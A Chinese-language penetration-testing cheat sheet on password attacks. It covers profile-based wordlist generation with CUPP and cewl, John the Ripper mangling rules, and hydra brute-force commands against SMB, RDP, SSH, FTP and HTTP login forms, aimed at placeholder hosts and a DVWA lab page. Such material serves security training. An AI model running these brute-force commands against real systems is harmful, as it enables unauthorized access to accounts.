字典

CUPP

• 按个人信息生成其专属的密码字典
• CUPP：Common User Password Profiler

安装

git clone

使用

  python  cupp.py-i  

• 输入上面命令会和程序进行交互，输入相关的信息就行

通过收集网站信息生成字典

 cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt
  # -m:最小单词长度
  -d 爬网深度
  -e 收集包含email地址信息
  -c 每个单词出现次数
  支持基本、摘要身份认证
  支持代理
    

用户密码变型

• 基于cewl的结果进行密码类型
• 末尾增加数字串
• 字母大小写变化
• 字母与符号互相转换
• 字母与数字互相转换
• P@$$w0rd

使用 John the Ripper 配置文件实现密码动态变型

 /etc/john/john.conf
  - [List.Rules:Wordlist]
  - $[0-9]$[0-9]$[0-9]
  - john --wordlist=cewl.txt -rules --stdout > m.txt (根据基本的字典生成新的字典)
-[list.Rules:test]
  $[0-9]$[0-9]$[0-9]$[a-zA-Z]
  $[0-9]$[0-9]$[0-9]$[a-zA-Z]$[a-zA-Z]$[a-zA-Z]$[`~!@#$%^&*()-_=+]
- john --wordlist=cewl.txt --rules=test --stdout > m.txt
- john --wordlist=ahm.lst --rules=test HASHFILE  

在线密码破解——hydra

hydra

• 九头蛇，砍去一个头即长出新头，后为大力神赫拉克勒斯所杀

Windows密码破解

 hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vV
hydra -l administrator -P pass.lst rdp://1.1.1.1 -t 1 -vV  

Linux 密码破解

 hydra -l  root  -P pass.lst ssh://1.1.1.1 -vV  

其他服务密码破解

 hydra -L user.lst -P pass.lst ftp://1.1.1.1 -s 2121 -e nsr -o p.txt -t 64  

图形化界面

xhydra

HTTP表单身份认证

 hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Lin:S=index.php" -V  

 hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login Failed" -V  

 /foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo:Foo
  C:先访问指定页面获得 cookie 
  H：指定http头
  https-post-form\http-get-form\https-get-form
  -S:使用 SSL 连接